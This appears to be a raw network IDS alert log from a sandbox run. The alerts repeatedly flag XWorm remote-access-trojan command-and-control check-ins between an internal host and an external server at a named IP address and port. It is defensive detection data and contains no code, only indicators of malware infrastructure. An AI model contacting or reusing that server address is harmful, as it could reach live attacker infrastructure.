2024-12-29T09:50:18.574130+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.599894+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:18.784637+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.814311+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:18.904468+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.933617+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:19.263348+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:19.292357+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:20.809032+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:20.837412+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.047340+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.076005+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.496954+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.539001+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.539311+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.656884+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:21.791442+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:22.413793+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:22.416426+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.032242+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.153286+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.218153+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.321307+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.362255+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.440756+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.483258+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.560131+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.651202+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.679769+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:23.770698+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.801288+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:24.337402+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.590080+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.826185+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.829139+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:24.920019+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.948706+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.039575+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.410895+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.454605+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.454744+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.525094+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:25.735223+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.765302+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:26.542763+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:26.616898+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:26.795033+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:26.815774+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.005261+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.054545+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.431716+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.432692+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.729998+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.733196+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:27.984051+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.993193+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:28.349203+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.647855+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.845282+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.915978+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:28.964601+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.055428+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.175074+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.175217+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.265968+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.266101+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.336681+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:29.385226+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.505083+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.567348+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:30.267599+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:30.269550+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:30.933815+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:30.944889+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.144316+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.173180+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.383523+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.388108+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.503069+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.507470+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:31.635012+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.635975+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:32.351876+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:32.361841+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.011259+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.039288+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.370884+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.691200+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.737075+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:34.820320+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.910856+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.910964+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:35.030635+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:36.402691+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:36.403723+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:36.636705+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.028153+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.054426+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.264888+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.269208+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.358341+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.388514+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:37.718652+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.788142+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:38.077885+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:38.081916+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:38.855270+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:38.881240+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.065640+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.125210+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.211108+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.245347+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.318908+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.365182+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.421416+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.485076+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:39.574975+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.604568+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.560743+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.586807+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.797191+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.799214+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:40.916824+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.918759+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:41.419394+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:41.421216+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:41.631321+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:41.632142+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:42.699143+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:42.725987+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:42.909380+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.055664+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.124721+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.306431+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.309216+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.457218+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.624505+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:43.639295+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.266999+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.267988+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
2024-12-29T09:50:44.477066+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.920968+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.955130+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49730 | 92.255.57.155 | 4411 | TCP |
